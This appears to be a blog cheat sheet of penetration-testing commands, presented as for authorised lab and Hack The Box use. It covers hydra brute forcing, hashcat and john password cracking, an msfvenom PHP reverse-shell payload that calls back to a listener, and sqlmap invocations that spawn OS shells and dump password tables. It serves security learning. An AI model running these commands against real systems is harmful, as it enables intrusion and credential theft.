The following is a list of useful command line tools that I’ve begun to use for simple penetration testing. IMPORTANT: please read the notes below before proceeding.

Before using any of these tools you should ensure that you have explicit permission to do so. I ONLY use these tools on my own air gapped network or against challenge sites (such as Hack The Box) where I am an authorised user. Using these tools against targets for which you DO NOT have explicit permission almost certainly constitutes an offence under the Computer Misuse Act 1990 (UK). There is simply no excuse for doing so when legitimate penetration testing and coding sites are available, many of which are free. Don’t waste your life and prospects on cyber crime – you will eventually make a mistake and get caught, no matter how good you think you are. Remember, if you have services hosted by a third party then you DO NOT have explicit permission to use these tools against your services without the consent of the host.

Some people believe that these techniques should not be published as it makes things easier for wannabe cyber criminals. The fact is that unless there is a global initiative to censor such material from the internet, this is simply not practical. Nothing I have published below is a secret: all of these tools have been around for a while and searching for any one of them will return pages and pages of instruction. The legitimate purpose of these tools is to test systems for vulnerabilities so that they can be target hardened against criminals – and that is the context in which I produce them below. If you are concerned about the vulnerability of your systems to any of these tools, then you should consider employing a qualified penetration tester to provide you with an analysis and recommendations of how you can improve your security.

If you already know that you have vulnerabilities in your systems, you should fix those before employing a penetration tester. Most basic systems can be secured by good cyber awareness and discipline, patch management and up to date anti-malware suites.

ARP – Address Resolution Protocol

Maps IP addresses to MAC addresses

arp-scan

Identifies hosts on a network

arp-scan 192.168.3.0/24 192.168.45.0/24
#identifies hosts on the 192.168.3.0/24 and 192.168.45.0/24 ranges

Brute Force Tools

hydra

Versatile brute force tool for many services

hydra -l root -P /path/dictionary.txt mysql://192.168.3.100
#Brute force mysql user root on target using dictionary passwords

hydra -l postgres -P /path/dict.txt postgres://192.168.3.100
#Brute force the postgres user on target using passwords from dict.txt

hydra -l bob -P /path/dict.txt -s 22 192.168.3.100 -t4 ssh
#Brute force ssh service for user bob on port 22 using passwords from dict.txt

Directory/File Fuzzers

Tools for locating hidden/unknown files and directories

dirsearch

python3 dirsearch.py -u http://10.10.10.28 -e php
#Scans for common directory names

gobuster

gobuster dir -u http://10.10.10.29/ -w /usr/share/wordlists/dirb/common.txt
#scans target for directories in the wordlist common.txt

gobuster dir -u http://10.10.10.191 -w dir.txt -x txt -b 403,404 --wildcard
#scans target for directories and .txt files (-x txt) from dir.txt; -b 403,404 drops those HTTP status codes from the output and --wildcard carries on even if the server answers every request

Hash Identification

hash-identifier

hash-identifier
#Prompts for hash then identifies possible algorithm
#Always internet search hashes before resorting to cracking

Password Cracking

Offline brute force tools and utilities

cewl

Spider that creates a wordlist based on a website

cewl -d 2 -m 5 -w wordlist.txt https://example.com
#generates wordlist.txt by spidering example.com to a depth of two (-d 2), keeping words of at least five characters (-m 5)

hashcat

Offline hash cracking tool

hashcat -m0 -a0 hashlist.txt /path/dict.txt --quiet
#Use dict.txt in straight/dictionary mode (-a0) against hashlist.txt, treating the hashes as MD5 (-m0)
#Always internet search hashes before resorting to cracking

john

Versatile offline cracking tool

#john keeps already cracked passwords in its pot file. Use --show to display them, or --pot=FILE to use a different pot file
#password_hashes in these examples is the output of unshadow (see below)
#hashes_win7 is a Windows hashdump (eg from Metasploit)

john --single password_hashes
#Mangles user data and compares hashes looking for matches

john -w=/path/dict.txt password_hashes
#Runs a dictionary attack against password_hashes using dict.txt

john --format=NT --wordlist=/path/dict.txt hashes_win7
#Runs a dictionary attack against Windows hashdump using dict.txt

#Always internet search hashes before resorting to cracking

unshadow

Combines Linux /etc/passwd and /etc/shadow into a single john-compatible file

#Requires Linux /etc/passwd and /etc/shadow files

unshadow passwd shadow > password_hashes

#unshadows passwd/shadow files and provides list of hashes compatible with john

zip2john

extracts hashes from protected zip files

zip2john backup.zip > hash
#extracts password hash from password protected zip
#Always internet search hashes before resorting to cracking

Payload Generation

msfvenom

Companion payload generator for the Metasploit Framework

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o phone_home.php

#Generates a php payload that calls back to LHOST on port 4444 and spawns a meterpreter shell.
#Create a matching listener in msfconsole, upload the payload to the target, then navigate to the payload file in a browser.

Port Scanning

nmap

Highly versatile port scanning tool with added functionality in the form of the scripting engine, which additionally reports vulnerabilities.

nmap -sS -sV -nvv -O 192.168.3.0/24 -oA tcp_result
#half-open (SYN) TCP scan (-sS); service/version detection (-sV);
#no DNS resolution and increased verbosity (-nvv); OS detection (-O); on range 192.168.3.0/24;
#output in all 3 formats (-oA), file prefix tcp_result

nmap -sU -F -nvv 192.168.3.0/24 192.168.45.0/24 -oA udp_result
#UDP scan (-sU); fast, top 100 ports (-F); no DNS resolution, increased verbosity; two target ranges;
#output in all 3 formats, file prefix udp_result

nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'
#full port scan (-p-), returns only the port numbers as a comma separated list.
#This is useful for Hack The Box when set to a variable which is rescanned, as the return is nicely formatted and uncluttered.

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p$ports 10.10.10.27
#Scan focused on known open ports: default scripts (-sC) and service/version detection (-sV)

grep --color 22/open/tcp *.gnmap
#search nmap results for open port 22 (SSH)

SNMP – Simple Network Management Protocol

  • Default port – 161.
  • Versions 1 and 2c offer no authentication or encryption.
  • Default community strings: public, private

grep --color 161/open/udp *.gnmap
#Searches all gnmap files and highlights pattern 161/open/udp
#ie searches nmap scans for default SNMP ports
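As an added worked example (not from the original post), the following does in Python what the grep/cut/tr/sed pipeline above and the grep 22/open/tcp and grep 161/open/udp searches do by hand, working from the .gnmap file that -oA writes. The sample scan output is constructed, and the function names are my own; it also handles the UDP state open|filtered, which a plain grep for 161/open/udp misses.

```python
from collections import namedtuple

Port = namedtuple("Port", "host port proto state service version")

# Constructed sample of nmap grepable (.gnmap) output as written by -oA; not a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sS -sU -sV -oA result 192.168.3.0/24
Host: 192.168.3.100 ()\tStatus: Up
Host: 192.168.3.100 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.6/, 135/filtered/tcp//msrpc///, 161/open/udp//snmp//SNMPv1 server (public)/\tIgnored State: closed (65532)
Host: 192.168.3.101 ()\tPorts: 445/open/tcp//microsoft-ds///, 161/open|filtered/udp//snmp///
# Nmap done at Mon Jan  1 00:01:00 2024 -- 256 IP addresses (2 hosts up) scanned in 60.00 seconds
"""


def parse_gnmap(text):
    """Yield one Port per entry in the tab-separated 'Ports:' field of each Host line."""
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:  # 'Status: Up' lines carry no port list
            continue
        host = fields["Host"].split(" ", 1)[0]
        for entry in fields["Ports"].split(", "):
            # entry layout: port/state/proto/owner/service/rpcinfo/version/
            # (nmap writes any '/' inside the version as '|', so a plain split is safe)
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            yield Port(host, int(port), proto, state, service, version)


def open_ports_csv(text, host, proto="tcp"):
    """Comma-separated open ports of one host, in the form nmap -p expects."""
    ports = sorted({p.port for p in parse_gnmap(text)
                    if p.host == host and p.proto == proto and p.state == "open"})
    return ",".join(str(p) for p in ports)


def hosts_with(text, port, proto, states=("open",)):
    """Hosts on which port/proto is in one of the given states (what grep 161/open/udp looks for).

    UDP scans frequently report 'open|filtered' rather than 'open', so a grep for
    161/open/udp alone can miss SNMP hosts; pass states=("open", "open|filtered").
    """
    return sorted({p.host for p in parse_gnmap(text)
                   if p.port == port and p.proto == proto and p.state in states})
```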

nmap scripting engine

nmap -sU -nvv -p161 --script snmp-brute 192.168.3.100 --script-args snmp-brute.communitiesdb=/path/dictionary.txt
#run the snmp-brute script against the target using the community strings in dictionary.txt
#The results can be searched for useful information such as usernames

onesixtyone

Tool that can be used to brute force community strings.

onesixtyone -c /path/dictionary.txt 192.168.3.100
#Scan target for community strings found in dictionary file

snmpwalk

Enumerates SNMP data (the MIB tree) from a host using a known community string.

snmpwalk -v 1 -c community 192.168.3.100
#use SNMP version 1 (-v 1) and walk the target using the community string named community (-c)

SQL – Structured Query Language

There are several deployments of SQL, such as MySQL, Postgresql and MSSQL each with different default ports and credentials.

mssqlclient.py

Used to establish remote connection to MSSQL server

mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
#establishes remote connection to MSSQL server where ARCHETYPE/sql_svc is the user

sqlmap

Tool for detecting SQL injection vulnerabilities in sql deployments and web applications, and for automating their exploitation. Where the database is reached through a web application, the request URL (as shown in the Referer header) and the Cookie should be captured using Burp Suite or HTTP Tracker, eg:

Referer: http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit
Cookie: security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989

sqlmap -d postgres://user:password@192.168.3.100:5432/postgres --os-shell
#Connect directly (-d) to the postgres database on 192.168.3.100:5432 with credentials user/password and spawn an OS shell (credentialled)

sqlmap -u "http://10.10.10.46/dashboard.php?search=a" --cookie="PHPSESSID=cookie" --os-shell
#Attempts to spawn an OS shell through the injectable search parameter, using the captured session cookie

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -b --current-db --current-user
#Assesses vulnerability and provides current database name and user

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --string="Surname" --users --passwords
#Extracts database management system users and password hashes (the option is --passwords; --string gives sqlmap a string that only appears in a true response)

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -U only_me --privileges
#List privileges of a specified database management system user (only_me)

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" --dbs
#Obtain a list of all databases

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot --tables
#Obtain a list of tables in specified database (noobot)

sqlmap -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users --columns
#Obtain list of columns in specified table (users) in specified database (noobot)

sqlmap -u "http://192.168.56.101/noobot/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=a88e42dd90fe61beb3eb46e903bd2989" -D noobot -T users -C user,password --dump
#Dump contents of specified columns (user, password) from specified table (users) from specified database (noobot)

Web App Scanners

nikto

nikto -host http://192.168.56.101/noobot
#Provides a scan that includes references to the Open Source Vulnerability Database (OSVDB)

Windows Enumeration

  • Default ports: 135 (RPC), 137 (NetBIOS name service), 139 (NetBIOS session, deprecated), 445 (SMB)
  • RIDs: 500 (Administrator), 501 (Guest), 502 (krbtgt, the Kerberos service account), 1000+ (users)
  • Common techniques for Windows enumeration are Null Session and RID recycling using enum4linux -r

enum4linux

Enumeration tool

enum4linux -a 192.168.3.11
#Can identify workgroups, domains (and controllers)

enum4linux -a -u user -p password -R 1100-1200 192.168.3.11
#Credentialled scan that also cycles RIDs in the range 1100-1200

net (credentialled Windows)

Display group membership information

net group "Domain Admins" /domain
#Identifies Domain Admin accounts

smbclient

SMB enumeration and share mounting

smbclient -N -L \\\\10.10.10.27\\
#List available shares (look for those which are not $)

smbclient -N \\\\10.10.10.27\\backups
#Attempts to connect to the share "backups" without a password (-N); if successful you get an smb prompt from which commands such as get and dir work

WordPress

Popular CMS; manual enumeration usually recovers the /blog path and /readme.html, which reveals the version.

wpscan

WordPress enumeration tool.

wpscan --url http://192.168.3.110/blog/
#Enumerates the WordPress install and reports known vulnerabilities (including those with Metasploit modules)